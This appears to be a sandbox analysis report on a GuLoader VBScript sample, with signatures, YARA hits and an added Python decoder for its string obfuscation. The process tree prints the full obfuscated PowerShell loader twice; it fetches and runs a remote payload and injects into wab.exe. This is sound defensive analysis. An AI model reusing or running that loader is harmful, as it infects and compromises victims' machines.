
Windows Analysis Report
time.vbs

Overview

General Information

Sample name: time.vbs
Analysis ID: 1446630
MD5: 673fa3ac445c7ae448c49ef3d154b4e8
SHA1: 097eaa21e81bf37a12a338e33366d429ef6a2ab9
SHA256: aeda53046f92e6a6f967262130c9238be1107224bd143399e6a66eae7ed2e401
Tags: vbs

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6344 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. 
fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingueEnstauDjellrBonde=GleamN ,elfe Bifew So.a-ugestOU.derb DisejAbeloe SunbcBlowjtGerha Re,seSFrejdy Knogs NatitDuk,eeDro.dmBacch.UnderNBilleePa,aptRedis.ThwarWConiieCholebBetteCChatslanth.iExempeRig enGapgltLov,a ');Kolesterol (Lnkampene 'Desig$ForreBudebla IsocdCitesiTil,sn.edaleCyb ruS kverUbluf.S.preH.gtnie,inteaSpe,edPateteBur.nrskadesBayon[Alask$LedigOOdinerTapisgNonapaVindknDe peiS rensspecim FruieCenterDegassGuilb],perm=kiloc$.edboScapsikGldssoSicklvU rembWrestrHusblas,phonD.moud Un,vssearcbLindgePlangk ParamCalvipTallie Ruinl ProtsReklaeRinghs Sg,f ');$Frakoblende127=Lnkampene 'ImproBSightaS.vsadAntipi MetanNonane Ejeru .uggr Spil. 
skraDKraknoGemenwAntipn eroslOutfeo BefuaShakedVerruFNintui Armel A.paeDebat(Wilda$S.ineSBe prkB rdsaPhoohd Evo eTre jvtjeneoSl,evl AdjodByzaneDamebrStboln.ofdieSemim,Spytk$HumorEFin.nk C,rbvPi.laiBougap Afmae avebr Fyrai SikanMutedgM more Strar Goddn,uneneConfu)Bespn ';$Frakoblende127=$Bnke[1]+$Frakoblende127;$Ekviperingerne=$Bnke[0];Kolesterol (Lnkampene 'Reall$HerlugThur,lTrommoSkrmsbGammiaKltrildrjed:UdspeVKansaichurrnToxicd timaiElektggyrit=Trill(WeheeT gemme.italsCapybtP.rli- ,ccePrevisaSti.ltGevanhPeyot Parce$KosttE Bi lkBodgev JyndikailypProdue,rallrUnm.diN.nrenSammegEnd ce HashrGliomnUndereGymno)Desme ');while (!$Vindig) {Kolesterol (Lnkampene 'Merce$Pr vagPrdiklClisto Forkb rieaTra dl .els:BeskyVHydr.eUnionn ranstBedvee PallkS mfuj.pgatoSrge.lUneneeBintjnmegal= Fjo.$ sandt,dblor efreuTaleseampli ') ;Kolesterol $Frakoblende127;Kolesterol (Lnkampene 'TilskSRokketNed,uaUlde r,emictlanda-HimmeS WicklPurpoeU,frseAct,apProvi L.ndb4Ajour ');Kolesterol (Lnkampene 'Mo.he$Impovg Unf l Mo,ioS.bpebGryntaFibr lBromi: U,ivVSlubriStuklnOmbindHyperiDrivag.egit= .ost(T,vemTAtom e andos ,vertVandi-JenkrPtjeneaReamatHamsthOvers Bj.ne$Hyp,nEKolpokRegulvlameligolilpSangveFolkerC ickiJordrnNelisgCeremeMultirTi lbn AfdeePet r)Pre.u ') ;Kolesterol (Lnkampene 'Odori$AgerbgSubselO teto S,deb,orinaMonumlS mme:KbekrRMgle.eStibis Tobau Fin,sDrbercMontiiR.sertSeksuaInvesnHi.litKeram=Kroni$TaktrgRagsolGenn,oWiyatbSt,afaRygsjlF.lde:S udrRv,rmoeUnchasSqualpHenwois.ederKedloaUdtaltBrevaiBo,ennDisarg aafr+ Cho,+Antih%antia$Unsq R PaksuOmgrdfUnfu.fEngleeReindrRetrosKonsuk Socee IrrerTakah.EuklicKo.stoFeticusank,nRingetFr,ss ') ;$Skadevolderne=$Ruffersker[$Resuscitant];}$Stealth=317356;$Smeltediglen=28607;Kolesterol (Lnkampene 'Col,u$,flivgs,ratlExploo La,hbBarosaP,olol,arco:Hvse.ORunprlMindaeRundsrtetr.aNonadcOmegneNdri,oCaud uSav ns,arbu Circu=bred, TiltnGundereover.tOrals-HaglsCTmreroClinon CenttTilfleVedrrnKle,itPromo Caram$Pale.ESaarsk ForkvTophaiForsmpExte 
eMoralr,kudsi.rasonTugbog.himoeKommir ondenSubtoecoutu ');Kolesterol (Lnkampene 'Nonme$.dsmigDej klUnle oforskbSheeta Tastl A lg:,nkebL Bru,hD nskuPostonAbe,idScolys Srad ,ejlt=Kasta Subst[GalloS.havayMaksisGradst T aneS ejlmI.elr.Ol erC EchooPsam,n,olkevAprjteApinarNoum tPrees] Vege:Local:Cal,rFBjninrDekreo Ald mEp,ncB NaiaaU,ryksUlykkeUnseg6Laund4 ,estSM.nottOmnidr CohoiJambonFaraog efor(udl,d$.atonOIsokol usleFrontr.elata Aktic SpoueCesiuo ligauTotemsBar.e) Bac. ');Kolesterol (Lnkampene 'Ae th$.rikkg,arbel .eneo KontbVa.utaSu lelBlomk:Pr,nkSRgforuTiskdbBalkogS.btrr AberoUnoveuYeastpMicrosNeome B ill=Slag, Unsto[Dia,lS Metoy boghsEx,ostForbee Ka fmDr.ek.OsteaT Safte.refaxBundgtSyndi.Une.tE,erminIndimcR sunoJessed ForniFlodhn R,tigArcad]Bygrn:Speci:FlugtA adipSStrobCBemgtIRadenI.lust.EkspeG ipleI,hestGydn,SSpredtGrantr ,ppliDeas,nChmilgPo en(Besla$ BlodL Tr,ahDemaruBa.esnKnowhdBade.sKunde)V,rol ');Kolesterol (Lnkampene 't.esi$PreregKvidrlNo.imo PrisbJawfia Thi,l Eksp:Cru hKL.skojBrugeoM,saprorbict Lys eTrundlT legeBlanknSinapsVel,e=Su,er$.egadSW.incuSoffibResergBrachrPannio.ejdiuEnceppDecigs Avis. SpaesN ggauCominbDagsrs ap ltP,ilorFre riIdocrnHabi.gConse(Kobiu$ KribSPo emt.lpaseSothiaPrelalSto it S rahInte ,Kumme$T.bleSMonosmR,esueAfkorlN.ttetEfterePrveld K.ruiMethagNukasl Sowde Inven,uleb)Modta ');Kolesterol $Kjortelens;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6316 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6536 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. 
fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingueEnstauDjellrBonde=GleamN ,elfe Bifew So.a-ugestOU.derb DisejAbeloe SunbcBlowjtGerha Re,seSFrejdy Knogs NatitDuk,eeDro.dmBacch.UnderNBilleePa,aptRedis.ThwarWConiieCholebBetteCChatslanth.iExempeRig enGapgltLov,a ');Kolesterol (Lnkampene 'Desig$ForreBudebla IsocdCitesiTil,sn.edaleCyb ruS kverUbluf.S.preH.gtnie,inteaSpe,edPateteBur.nrskadesBayon[Alask$LedigOOdinerTapisgNonapaVindknDe peiS rensspecim FruieCenterDegassGuilb],perm=kiloc$.edboScapsikGldssoSicklvU rembWrestrHusblas,phonD.moud Un,vssearcbLindgePlangk ParamCalvipTallie Ruinl ProtsReklaeRinghs Sg,f ');$Frakoblende127=Lnkampene 'ImproBSightaS.vsadAntipi MetanNonane Ejeru .uggr Spil. 
skraDKraknoGemenwAntipn eroslOutfeo BefuaShakedVerruFNintui Armel A.paeDebat(Wilda$S.ineSBe prkB rdsaPhoohd Evo eTre jvtjeneoSl,evl AdjodByzaneDamebrStboln.ofdieSemim,Spytk$HumorEFin.nk C,rbvPi.laiBougap Afmae avebr Fyrai SikanMutedgM more Strar Goddn,uneneConfu)Bespn ';$Frakoblende127=$Bnke[1]+$Frakoblende127;$Ekviperingerne=$Bnke[0];Kolesterol (Lnkampene 'Reall$HerlugThur,lTrommoSkrmsbGammiaKltrildrjed:UdspeVKansaichurrnToxicd timaiElektggyrit=Trill(WeheeT gemme.italsCapybtP.rli- ,ccePrevisaSti.ltGevanhPeyot Parce$KosttE Bi lkBodgev JyndikailypProdue,rallrUnm.diN.nrenSammegEnd ce HashrGliomnUndereGymno)Desme ');while (!$Vindig) {Kolesterol (Lnkampene 'Merce$Pr vagPrdiklClisto Forkb rieaTra dl .els:BeskyVHydr.eUnionn ranstBedvee PallkS mfuj.pgatoSrge.lUneneeBintjnmegal= Fjo.$ sandt,dblor efreuTaleseampli ') ;Kolesterol $Frakoblende127;Kolesterol (Lnkampene 'TilskSRokketNed,uaUlde r,emictlanda-HimmeS WicklPurpoeU,frseAct,apProvi L.ndb4Ajour ');Kolesterol (Lnkampene 'Mo.he$Impovg Unf l Mo,ioS.bpebGryntaFibr lBromi: U,ivVSlubriStuklnOmbindHyperiDrivag.egit= .ost(T,vemTAtom e andos ,vertVandi-JenkrPtjeneaReamatHamsthOvers Bj.ne$Hyp,nEKolpokRegulvlameligolilpSangveFolkerC ickiJordrnNelisgCeremeMultirTi lbn AfdeePet r)Pre.u ') ;Kolesterol (Lnkampene 'Odori$AgerbgSubselO teto S,deb,orinaMonumlS mme:KbekrRMgle.eStibis Tobau Fin,sDrbercMontiiR.sertSeksuaInvesnHi.litKeram=Kroni$TaktrgRagsolGenn,oWiyatbSt,afaRygsjlF.lde:S udrRv,rmoeUnchasSqualpHenwois.ederKedloaUdtaltBrevaiBo,ennDisarg aafr+ Cho,+Antih%antia$Unsq R PaksuOmgrdfUnfu.fEngleeReindrRetrosKonsuk Socee IrrerTakah.EuklicKo.stoFeticusank,nRingetFr,ss ') ;$Skadevolderne=$Ruffersker[$Resuscitant];}$Stealth=317356;$Smeltediglen=28607;Kolesterol (Lnkampene 'Col,u$,flivgs,ratlExploo La,hbBarosaP,olol,arco:Hvse.ORunprlMindaeRundsrtetr.aNonadcOmegneNdri,oCaud uSav ns,arbu Circu=bred, TiltnGundereover.tOrals-HaglsCTmreroClinon CenttTilfleVedrrnKle,itPromo Caram$Pale.ESaarsk ForkvTophaiForsmpExte 
eMoralr,kudsi.rasonTugbog.himoeKommir ondenSubtoecoutu ');Kolesterol (Lnkampene 'Nonme$.dsmigDej klUnle oforskbSheeta Tastl A lg:,nkebL Bru,hD nskuPostonAbe,idScolys Srad ,ejlt=Kasta Subst[GalloS.havayMaksisGradst T aneS ejlmI.elr.Ol erC EchooPsam,n,olkevAprjteApinarNoum tPrees] Vege:Local:Cal,rFBjninrDekreo Ald mEp,ncB NaiaaU,ryksUlykkeUnseg6Laund4 ,estSM.nottOmnidr CohoiJambonFaraog efor(udl,d$.atonOIsokol usleFrontr.elata Aktic SpoueCesiuo ligauTotemsBar.e) Bac. ');Kolesterol (Lnkampene 'Ae th$.rikkg,arbel .eneo KontbVa.utaSu lelBlomk:Pr,nkSRgforuTiskdbBalkogS.btrr AberoUnoveuYeastpMicrosNeome B ill=Slag, Unsto[Dia,lS Metoy boghsEx,ostForbee Ka fmDr.ek.OsteaT Safte.refaxBundgtSyndi.Une.tE,erminIndimcR sunoJessed ForniFlodhn R,tigArcad]Bygrn:Speci:FlugtA adipSStrobCBemgtIRadenI.lust.EkspeG ipleI,hestGydn,SSpredtGrantr ,ppliDeas,nChmilgPo en(Besla$ BlodL Tr,ahDemaruBa.esnKnowhdBade.sKunde)V,rol ');Kolesterol (Lnkampene 't.esi$PreregKvidrlNo.imo PrisbJawfia Thi,l Eksp:Cru hKL.skojBrugeoM,saprorbict Lys eTrundlT legeBlanknSinapsVel,e=Su,er$.egadSW.incuSoffibResergBrachrPannio.ejdiuEnceppDecigs Avis. SpaesN ggauCominbDagsrs ap ltP,ilorFre riIdocrnHabi.gConse(Kobiu$ KribSPo emt.lpaseSothiaPrelalSto it S rahInte ,Kumme$T.bleSMonosmR,esueAfkorlN.ttetEfterePrveld K.ruiMethagNukasl Sowde Inven,uleb)Modta ');Kolesterol $Kjortelens;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2664 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 3688 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
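The PowerShell stage in the tree above hides every string behind a stride walk: $Massesamfund is assembled from 'Su' + 'bstrin' + 'g' so the method name Substring never appears literally; Lnkampene walks each quoted literal from index 5 in steps of 6 and keeps one character per step ($palaverist = 1), so every real character is preceded by five junk characters; and Kolesterol is "& ($Maimedly) (...)" with $Maimedly decoding to iex, so every Kolesterol call executes decoded text. The decoder below is an added example, not part of the report or of the sample. Its embedded SAMPLE is a constructed excerpt: the command line's real prologue plus four of its literals, which decode to 'User-Agent', 'iex', '>' and https://www.sendspace.com/pro/dl/exw2o1, the first GET in the network entries further down. Caveat: this page's HTML rendering has collapsed runs of spaces inside the command line (the User-Agent literal, for instance, no longer decodes cleanly from the page text), so run the decoder on the original time.vbs or on a command line captured from process telemetry, not on this page. It reads the function name, start index and stride from the For loop instead of hard-coding them, on the assumption (not verified here) that related samples vary those constants.

```python
"""
Decoder for the stride-based string hiding used by the PowerShell stage in
the process tree above.  Added example; not code from the sandbox report or
from the sample itself.
"""
import re

# Loop constants as written in this sample: For($i=5; $i -lt len-1; $i+=6),
# taking Substring($i, 1) on every iteration.
DEFAULT_START, DEFAULT_STRIDE, DEFAULT_WIDTH = 5, 6, 1

# Constructed excerpt: the real prologue of the command line plus four literals
# whose decoded values can be checked against the report's own network data.
# Literals that this page's rendering has whitespace-collapsed are left out.
SAMPLE = (
    "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';"
    "Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;"
    "For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers."
    "$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}"
    "function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}"
    "$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';"
    "$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';"
    "$Malaxate=Lnkampene 'D.bri>Fiske ';"
    "$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';"
)


def decode_literal(s, start=DEFAULT_START, stride=DEFAULT_STRIDE, width=DEFAULT_WIDTH):
    """Replicate Lnkampene: keep `width` chars every `stride` chars from `start`,
    stopping before len(s) - width exactly as the sample's -lt test does."""
    limit = len(s) - width
    return "".join(s[i:i + width] for i in range(start, limit, stride))


# "Function NAME($x){ ... For($i=START; $i -lt $n; $i+=STRIDE)"; PowerShell keywords
# are case-insensitive, hence re.IGNORECASE.
_DECODER_DEF = re.compile(
    r"function\s+(\w+)\(\$\w+\)\{[^}]*?"
    r"for\(\$\w+=(\d+);\$\w+\s+-lt\s+\$\w+;\$\w+\+=(\d+)\)",
    re.IGNORECASE,
)


def detect_parameters(script):
    """Return (decoder function name, start index, stride) parsed from the script."""
    m = _DECODER_DEF.search(script)
    if not m:
        raise ValueError("no stride-decoder function found")
    return m.group(1), int(m.group(2)), int(m.group(3))


def decode_script(script):
    """Decode every single-quoted literal passed to the decoder function.
    Keys are the variable the result is assigned to, or a positional tag for
    inline uses such as Kolesterol (Lnkampene '...')."""
    name, start, stride = detect_parameters(script)
    call = re.compile(r"(?:(\$\w+)\s*=\s*)?" + re.escape(name) + r"\s+'((?:[^']|'')*)'")
    decoded = {}
    for n, m in enumerate(call.finditer(script)):
        literal = m.group(2).replace("''", "'")   # PowerShell single-quote escape
        decoded[m.group(1) or f"<arg {n}>"] = decode_literal(literal, start, stride)
    return decoded


if __name__ == "__main__":
    for var, value in decode_script(SAMPLE).items():
        print(f"{var:16} -> {value!r}")
```

The while (!$Vindig) download loop and the constants $Stealth=317356 and $Smeltediglen=28607 near the end of the command line are not interpreted here; following them requires the full, uncollapsed script.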
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.2318228321.0000000005E94000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000004.00000002.2325090155.0000000008B80000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000001.00000002.2672896517.0000015C3E291000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000004.00000002.2329721255.000000000CC2B000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: powershell.exe PID: 2656 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
(3 further entries not shown)
Source | Rule | Description | Author | Strings
amsi64_2656.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_2656.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | string hits:
• 0xffa3:$b2: ::FromBase64String(
• 0xd34e:$s1: -join
• 0x6afa:$s4: +=
• 0x6bbc:$s4: +=
• 0xade3:$s4: +=
• 0xcf00:$s4: +=
• 0xd1ea:$s4: +=
• 0xd330:$s4: +=
• 0xf579:$s4: +=
• 0xf5f9:$s4: +=
• 0xf6bf:$s4: +=
• 0xf73f:$s4: +=
• 0xf915:$s4: +=
• 0xf999:$s4: +=
• 0xda62:$e4: Get-WmiObject
• 0xdc51:$e4: Get-Process
• 0xdca9:$e4: Start-Process
amsi32_6536.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | string hits:
• 0xff04:$b2: ::FromBase64String(
• 0xd34e:$s1: -join
• 0x6afa:$s4: +=
• 0x6bbc:$s4: +=
• 0xade3:$s4: +=
• 0xcf00:$s4: +=
• 0xd1ea:$s4: +=
• 0xd330:$s4: +=
• 0xf579:$s4: +=
• 0xf5f9:$s4: +=
• 0xf6bf:$s4: +=
• 0xf73f:$s4: +=
• 0xf915:$s4: +=
• 0xf999:$s4: +=
• 0xda62:$e4: Get-WmiObject
• 0xdc51:$e4: Get-Process
• 0xdca9:$e4: Start-Process
• 0x17909:$e4: Get-Process

              System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs", ProcessId: 6344, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs", ProcessId: 6344, ProcessName: wscript.exe
